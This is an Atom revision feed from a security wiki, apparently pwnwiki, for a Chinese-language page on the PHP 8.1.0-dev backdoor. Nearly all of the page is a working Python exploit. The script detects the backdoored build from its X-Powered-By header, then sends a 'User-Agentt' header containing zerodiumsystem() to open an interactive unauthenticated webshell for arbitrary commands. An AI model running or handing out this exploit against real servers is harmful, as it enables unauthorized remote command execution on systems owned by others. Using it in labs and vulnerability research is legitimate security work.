<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%2Fzh-cn</id>
	<title>PHP 8.1.0-dev 後門遠程命令執行/zh-cn - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%2Fzh-cn"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C/zh-cn&amp;action=history"/>
	<updated>2026-04-08T17:31:09Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C/zh-cn&amp;diff=3847&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==漏洞影响==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C/zh-cn&amp;diff=3847&amp;oldid=prev"/>
		<updated>2021-06-01T03:07:27Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==漏洞影响==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==漏洞影响==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
PHP 8.1.0-dev&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python3&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: PHP 8.1.0-dev WebShell RCE (Unauthenticated)&lt;br /&gt;
# Date: 2021-05-31&lt;br /&gt;
# Exploit Author: Mayank Deshmukh&lt;br /&gt;
# Vendor Homepage: https://www.php.net/&lt;br /&gt;
# Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor&lt;br /&gt;
# Version: PHP 8.1.0-dev&lt;br /&gt;
# Tested on: Kali GNU/Linux 2020.3&lt;br /&gt;
# Author website: https://coldfusionx.github.io&lt;br /&gt;
# Author email: coldfusionx@outlook.com&lt;br /&gt;
# Detailed POC: https://github.com/ColdFusionX/PHP-8.1.0-dev_WebShell-RCE&lt;br /&gt;
&lt;br /&gt;
import argparse, textwrap&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
parser = argparse.ArgumentParser(description=&amp;quot;PHP 8.1.0-dev WebShell RCE by ColdFusionX&amp;quot;, formatter_class=argparse.RawTextHelpFormatter, &lt;br /&gt;
epilog=textwrap.dedent(''' &lt;br /&gt;
Exploit Usage : &lt;br /&gt;
./exploit.py -l http://127.0.0.1&lt;br /&gt;
[^] WebShell=- id&lt;br /&gt;
OR&lt;br /&gt;
[^] WebShell=- whoami&lt;br /&gt;
'''))                     &lt;br /&gt;
&lt;br /&gt;
parser.add_argument(&amp;quot;-l&amp;quot;,&amp;quot;--url&amp;quot;, help=&amp;quot;PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)&amp;quot;) &lt;br /&gt;
args = parser.parse_args()&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) &amp;lt;= 2:&lt;br /&gt;
    print (f&amp;quot;Exploit Usage: ./exploit.py -h [help] -l [url]&amp;quot;)          &lt;br /&gt;
    sys.exit()  &lt;br /&gt;
&lt;br /&gt;
# Variables&lt;br /&gt;
Host = args.url&lt;br /&gt;
&lt;br /&gt;
r = requests.session()&lt;br /&gt;
&lt;br /&gt;
## Use this for Proxy&lt;br /&gt;
#r.proxies.update( { 'http':'http://127.0.0.1:8080' } ) &lt;br /&gt;
&lt;br /&gt;
def svcheck():&lt;br /&gt;
    verify = r.get(f'{Host}')&lt;br /&gt;
&lt;br /&gt;
    if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') :&lt;br /&gt;
        print(&amp;quot;Target is running on PHP 8.1.0-dev\n&amp;quot;)&lt;br /&gt;
        return True&lt;br /&gt;
&lt;br /&gt;
def exec():&lt;br /&gt;
    headerscontent = {&lt;br /&gt;
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',&lt;br /&gt;
            'User-Agentt' : f'zerodiumsystem(&amp;quot;{Command}&amp;quot;);'&lt;br /&gt;
                     }&lt;br /&gt;
 &lt;br /&gt;
    door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False)&lt;br /&gt;
&lt;br /&gt;
    resp = door.text.split(&amp;quot;&amp;lt;!DOCTYPE html&amp;gt;&amp;quot;)[0]&lt;br /&gt;
    if (resp == &amp;quot;&amp;quot;):&lt;br /&gt;
        print()&lt;br /&gt;
        print(&amp;quot;Invalid Command&amp;quot;)&lt;br /&gt;
        print()   &lt;br /&gt;
    else:&lt;br /&gt;
        print()&lt;br /&gt;
        print(resp)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    print ('\n[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX \n ')&lt;br /&gt;
    try:    &lt;br /&gt;
        if svcheck() == True:&lt;br /&gt;
            print(&amp;quot;*Shoot your commands below* \n&amp;quot;)&lt;br /&gt;
            try:&lt;br /&gt;
                while True:&lt;br /&gt;
                    Command = input(&amp;quot;[^] WebShell=- &amp;quot;)&lt;br /&gt;
                    exec()&lt;br /&gt;
            except:&lt;br /&gt;
                print(&amp;quot;\r\nExiting.&amp;quot;)&lt;br /&gt;
                sys.exit(-1)&lt;br /&gt;
    &lt;br /&gt;
    except Exception as ex:&lt;br /&gt;
        print('Invalid URL or Target not Vulnerable')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>